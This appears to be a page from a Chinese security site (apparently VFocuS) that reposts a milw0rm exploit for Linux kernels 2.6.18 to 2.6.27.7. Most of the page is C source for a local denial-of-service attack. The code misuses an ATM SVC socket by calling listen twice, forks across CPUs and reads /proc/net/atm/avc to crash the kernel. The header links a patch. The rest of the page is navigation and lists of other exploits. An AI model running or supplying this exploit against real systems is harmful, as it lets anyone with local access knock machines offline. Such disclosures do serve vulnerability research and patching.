首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Local DoS Exploit
来源:http://www.milw0rm.com 作者:Oberheide 发布时间:2008-12-15  

/*                     
Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Dos Exploit
ariginal idéé : Jon Oberheide łł
http://www.milw0rm.com/exploits/7405
tested : 2.6.27.7-generic - 2.6.18 - 2.6.24-1                      
by :  ADU-T                                                        
patching :
http://marc.info/?l=linux-netdev&m=122841256115780&w=2  
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <linux/atm.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
                     
#define NUM_CPUS 8   
#define ATM "/proc/net/atm/avc"
                             
int                          
main(void)                   
{                            
    char *err, adurit[2000]; 
    int i, ret, sock, proc;  
    struct atm_qos dj;       
    struct sockaddr_atmsvc addr;
                              
                              
                              
    sock = socket(PF_ATMSVC, SOCK_DGRAM, 0);
                                          
                                          
    memset(&dj, 0, sizeof(dj));           
    dj.rxtp.traffic_class = ATM_UBR;      
    dj.txtp.traffic_class = ATM_UBR;      
    dj.aal = ATM_NO_AAL;                  
                                          

    ret = setsockopt(sock, SOL_ATM, SO_ATMQOS, &dj, sizeof(dj));
    if (ret == -1) {
        printf("failed !\n");
        return 1;
    }
    memset(&addr, 0, sizeof(addr));
    addr.sas_family = AF_ATMSVC;
 
    bind(sock, (struct sockaddr *) &addr, sizeof(addr));
 
    listen(sock, 10);
    listen(sock, 10);

    for (i = 1; i < NUM_CPUS; ++i) {
        if (fork() != 0) {
            break;
        }
    }
    proc = open(ATM, O_RDONLY);
    ret = read(proc, &adurit, 2000);
    close(proc);

    return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WebPhotoPro exploit written in
·EvansFTP (EvansFTP.ocx) Remote
·ProSysInfo TFTP Server TFTPDWI
·Flatnux html/javascript Inject
·Amaya Web Browser 10.0.1/10.1-
·eZ Publish < 3.9.5/3.10.1/4.0.
·Wysi Wiki Wyg 1.0 Remote Passw
·Mediatheka <= 4.2 Remote Blind
·MS Visual Basic ActiveX Contro
·MS Internet Explorer XML Parsi
·Internet Explorer 8.0 Beta 2 A
·eZ Publish 3.9.0/3.9.5/3.10.1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved